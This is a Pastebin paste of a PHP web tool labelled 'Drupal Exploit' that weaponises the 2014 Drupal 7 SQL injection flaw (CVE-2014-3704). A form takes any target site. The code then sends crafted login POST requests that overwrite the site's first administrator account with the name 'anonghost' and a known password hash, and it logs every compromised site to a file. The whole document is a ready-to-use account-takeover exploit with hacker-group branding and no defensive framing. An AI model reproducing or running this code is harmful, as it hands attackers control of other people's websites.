Guest User

Untitled

a guest
Apr 22nd, 2017
34
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.92 KB | None | 0 0
  1. <?php ?> <!Doctype HTML>
  2. <html>
  3. <head>
  4. <title>Drupal Exploit</title>
  5. <body style="background-image: url('http://geekyard.com/Download/Hackers_Wallpaper_5.jpg'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  6. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  7. <style type="text/css">
  8. .mymargin{
  9. margin-top:100px;
  10. color:white;
  11. font-family: monospace;
  12. }
  13. body {
  14. font-family: 'Audiowide', serif;
  15. font-size: 20px;
  16.  
  17. }
  18. </style>
  19. </head>
  20. <body>
  21. <div class="mymargin">
  22. <center>
  23. <font color="#00FF66"><h1>Drupal Exploit</h1></font>
  24.  
  25. <form method="GET" action="">
  26. Site : <input type="text" name="url" placeholder="Example: www.site.com">
  27. <input type="submit" name="submit" value="submit">
  28. </form>
  29. <br>
  30. <?php
  31. #-----------------------------------------------------------------------------#
  32. # Exploit Title: Drupal core 7.x - SQL Injection #
  33. # Date: Oct 16 2014 #
  34. # Exploit Author: Dustin D&#1043;rr #
  35. # Software Link: http://www.drupal.com/ #
  36. # Version: Drupal core 7.x versions prior to 7.32 #
  37. # CVE: CVE-2014-3704 #
  38. #-----------------------------------------------------------------------------#
  39. $file = fopen("DRUPAL-HACKED.txt", "a");
  40. error_reporting(0);
  41. if (isset($_GET['submit'])) {
  42. $url = "http://" . $_GET['url'];
  43. $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  44. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  45. ", 'content' => $post_data));
  46. $ctx = stream_context_create($params);
  47. $data = file_get_contents($url . '/user/login/', null, $ctx);
  48. echo "<h4>Scanning at \"/user/login/</h4>\"";
  49. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  50. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  51. echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  52. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  53. fwrite($fp, "Succes! User:anonghost Pass:admin -> {$url}/user/login");
  54. fwrite($fp, "
  55. ");
  56. fwrite($fp, "======================================Donnazmi==============================================================");
  57. fwrite($fp, "
  58. ");
  59. fclose($fp);
  60. } else {
  61. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  62. }
  63. }
  64. if (isset($_GET['submit'])) {
  65. $url = "http://" . $_GET['url'] . "/";
  66. $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  67. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  68. ", 'content' => $post_data));
  69. $ctx = stream_context_create($params);
  70. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  71. echo "<h4>Scanning at \"Index</h4>\"";
  72. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  73. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  74. echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  75. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  76. fwrite($fp, "Success! User:anonghost Pass:admin -> {$url}/user/login");
  77. fwrite($fp, "
  78. ");
  79. fwrite($fp, "======================================Donnazmi==============================================================");
  80. fwrite($fp, "
  81. ");
  82. fclose($fp);
  83. } else {
  84. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  85. }
  86. }
  87. ?>
  88. <br>
  89. <font face="Audiowide" color="#00FF66" size="2">
  90. <font color="#00FF66">Orignal Code was with Some Bug i jux refined it | rummykhan </font><br />
  91. Edited : <font color="white">Donnazmi</font> <font color="white">|</font> Twitter: <font color="white"><a href="https://twitter.com/ungku_nazmi">Dondon xD</a></font><br /><br />
  92. <br > <font color="#00FF66">For more www.anonghost.gov</font>
  93. <br />visit <a href="http://google.com" target="_blank" style="text-decoration: none;">www.anonghost.gov</a>
  94. </font>
  95. </div>
  96.  
  97. </body>
  98. </html> <?
Add Comment
Please, Sign In to add comment